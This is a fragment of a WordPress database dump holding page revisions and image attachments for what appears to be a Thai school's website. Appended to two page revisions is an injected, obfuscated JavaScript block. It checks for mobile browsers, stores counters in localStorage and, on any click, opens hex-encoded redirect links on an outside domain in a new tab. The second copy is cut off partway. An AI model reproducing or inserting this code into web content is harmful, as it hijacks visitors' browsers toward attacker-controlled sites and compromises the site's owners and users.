-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:05:05','2024-08-08 14:05:05','',14,'http://pakhaeng.ssk.in.th/?p=735',0,'revision','',0),
(736,1,'2024-08-08 21:06:32','2024-08-08 14:06:32','','ย้าย','','inherit','','closed','','%e0%b8%a2%e0%b9%89%e0%b8%b2%e0%b8%a2-2','','','2024-08-08 21:06:32','2024-08-08 14:06:32','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png',0,'attachment','image/png',0),
(738,1,'2024-08-08 21:06:46','2024-08-08 14:06:46','','ดูเกรด','','inherit','','closed','','%e0%b8%94%e0%b8%b9%e0%b9%80%e0%b8%81%e0%b8%a3%e0%b8%94-2','','','2024-08-08 21:06:46','2024-08-08 14:06:46','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png',0,'attachment','image/png',0),
(739,1,'2024-08-08 21:07:09','2024-08-08 14:07:09','','ห้องประชุม','','inherit','','closed','','%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1-2','','','2024-08-08 21:07:09','2024-08-08 14:07:09','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png',0,'attachment','image/png',0),
(740,1,'2024-08-08 21:09:59','2024-08-08 14:09:59','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 